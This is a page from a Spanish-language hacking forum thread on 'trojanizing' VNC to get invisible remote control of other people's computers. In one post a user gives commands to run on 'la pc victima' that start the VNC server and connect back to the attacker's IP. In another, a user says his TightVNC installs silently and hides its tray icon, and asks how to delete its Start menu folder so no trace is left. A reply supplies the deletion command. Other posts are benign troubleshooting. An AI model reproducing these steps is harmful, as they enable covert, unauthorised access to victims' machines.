elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Troyanizando VNC - Control Remoto Invisible
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando VNC - Control Remoto Invisible  (Leído 208,551 veces)
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #140 en: 11 Abril 2008, 01:17 am »

Bueno, resulta que nunca había utilizado el TightVNC, así que me decidí a probarlo, yyy, ya he encontrado la manera de solucionar lo que preguntas gaussio, y sin mucho trabajo que digamos, solo haciendo uso de opciones que ya trae el programa.

Resulta que el programa permite la ejecución desde consola de comandos (cmd)

Código:
winvnc /?
Para todas las opciones  :P

Así que para realizar una conexion inversa, solo tenemos que dejar el TightVNC en listening,

Y en la pc victima;

winvnc -run, para ejecutar el server, y luego
winvnc -connect 190.190.190.001, aquí al final hay que poner nuestra ip claro esta

Entre comando y comando debe de haber una pequeña espera (el tiempo que demora en iniciarse el server), ya que de lo contrario salta un mensaje avisando que no hay ninguna instancia abierta del programa.

Además, también hay que tener en cuenta que para ejecutar esto hay que situarse en la carpeta de instalación del programa, ej; C:\Archivos de programa\Tightvnc,ya que si lo ponemos donde nos inicia el cmd por defecto no funciona  ::)

Espero te sirva  ;D

Saludos

P.D: Conclusión, debes olvidar todo lo que había puesto en mi post anterior, que el whatchanged y ...  :laugh:
« Última modificación: 11 Abril 2008, 01:35 am por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Brehaf

Desconectado Desconectado

Mensajes: 131


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #141 en: 11 Abril 2008, 01:27 am »

Muy buenas quiero aprovechar este post por que tengo un problema con el ultravnc , y aunque en el foro se a dicho que ante de preguntar  que se busque, llevo dos día con el problema y no soy capas de resolverlo. Este es el problema, he configura el ultravnc en mi equipo. Pero como suele pasar nuca sale nada  a la primera siempre hay algo que se escapa a la hora de configurar el programa  y es que cuando entro tanto a través de htpp//xxx.xxx.xxx.:5800 como por el:5900 se me abre mucha ventana una detrás de otra sin para y si muevo el ratón noto que continua  como si fuera en cascada y ya he probado con la resolución de la pantalla  ,haber si me podéis echar un cable .

muchas gracias  por leer mi problema
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #142 en: 11 Abril 2008, 01:39 am »

No entiendo bien tu pregunta... según veo te estas conectando a traves del navegador,  por medio de java supongo ,pero te saltan muchas ventanas separadas?? o en realidad, te salta la ventana, y dentro de esta, una nueva ventana, y dentro de esta última otra, y otra, y otra.....  :P

Te estas conectando a ti mismo? o, a otra pc?

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Brehaf

Desconectado Desconectado

Mensajes: 131


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #143 en: 11 Abril 2008, 01:59 am »

Novlucker , ante de todo gracias por responde ,te cuento me esto conectado yo mismo (de mi pc a mi pc) el motivo porque ante de instalar el programa en otro pc quiero ver como funciona, luego cuando me conecto atravez de java me salta una venta,luego otra venta y otra ventana .......... sin para , y si me conecto atravez de programa me sale lo mismo
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #144 en: 11 Abril 2008, 02:12 am »

Como te pregunte, esas ventanas te salen una dentro de otra verdad??

Si es así, es porque tu tienes la ventana en pantalla, pero te conectas a ti mismo, entonces a traves de tu viewer ves la ventana que tienes en pantalla, y la ventana que tienes en pantalla tiene tu viewer que esta viendo la pantalla que tu tienes y ,así al infinito, es un efecto parecido a verse en un espejo, y tener un espejo detras, la imagen se refleja una y otra vez  :rolleyes:

O sea que solo es un efecto visual, y que dicho sea de paso a mi también me confundió un poco en mis comienzos, pero no es ningún problema de configuración  ;D

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Brehaf

Desconectado Desconectado

Mensajes: 131


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #145 en: 11 Abril 2008, 02:20 am »

Novlucker , entoce si me voy a otro Pc y lo configuro tal como yo lo he configurado no tendre problema "" ;D.  pero lo que no me cuada es que si es un efecto parecido a verse a un espejo, la image que yo veo no esta parada y si muevo un poco el raton noto  como si la ventana no tuviera fin .
 
pero de toda forma  muchas gracias , ya al meno me quedo mas tanquilo
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #146 en: 11 Abril 2008, 02:23 am »

Es que no, la imagen debería de moverse, deberías de ver mucho punteros, una dentro de cada ventana, y al mover el puntero deberian de moverse todos, quizás tienes habilitada la opción de solo ver, y es por eso que la imagen no se mueve, revisa la configuración  :P

Igualmente si fuera solo esto, la respuesta es si, si te vas a otra máquina debería de estar todo ok, y debería de verse solo una ventana, igualmente revisa lo del envío de movimiento del mouse y las teclas  ;)

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Brehaf

Desconectado Desconectado

Mensajes: 131


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #147 en: 11 Abril 2008, 02:35 am »

Novlucker , Pues te agradezco la ayuda que me a prestado  ya me puedo ir  a dormí tranquilo esta noche, lo que boy hacer mañana es que como tengo otro pc en casa lo boy a conectar lo dos entre si. (Espero que esto se pueda hacer control remoto conectado entre si  los dos pc en la opción de grupo de trabajo).

De toda forma gracias de nuevo  :laugh:

P.D: mas adelante  me gustaría  que me explicara  como puedo configura este programa  para dar seguridad a PC para que no entre nadie que no tenga permiso. Pero poquito a poquito  ;D
En línea

MagnoBalt

Desconectado Desconectado

Mensajes: 58


Los Buenos Artitas Copian, los Grandes Roban


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #148 en: 26 Julio 2008, 03:04 am »

holaa estoy teniendo un problemaa.. he ttroyanizado el TightVNC.. esta casi invisible, se instala silenciosamente, importa los .reg, esconde icono en la barra de tarea..
Pero me surgio un problemita.. Resulta q al intalarse por default el vnc deja una carpeta en el menu inicio, entonces lo quiero Hacer es eliminar el arbol completo del directorio con el comando RD.. pèro me dice esto:

rd /S /Q "%HOMEDRIVE%\DOCUME~1\All Users\Menú Inicio\Programas\tightvnc"

El sistema no puede hallar la ruta especificada.

lo intente asi tmb

rd /S /Q "C:\DOCUME~1\All Users\Menú Inicio\Programas\tightvnc"

y sin las comillas tmb lo intente (ahi se arma peor los errores) ... alguien me puede decir en q estoy errando con el comando...

gracias... 
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando VNC - Control Remoto Invisible
« Respuesta #149 en: 26 Julio 2008, 03:18 am »

Código:
rd /s /q %allusersprofile%\menú inicio\programas\tightvnc

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines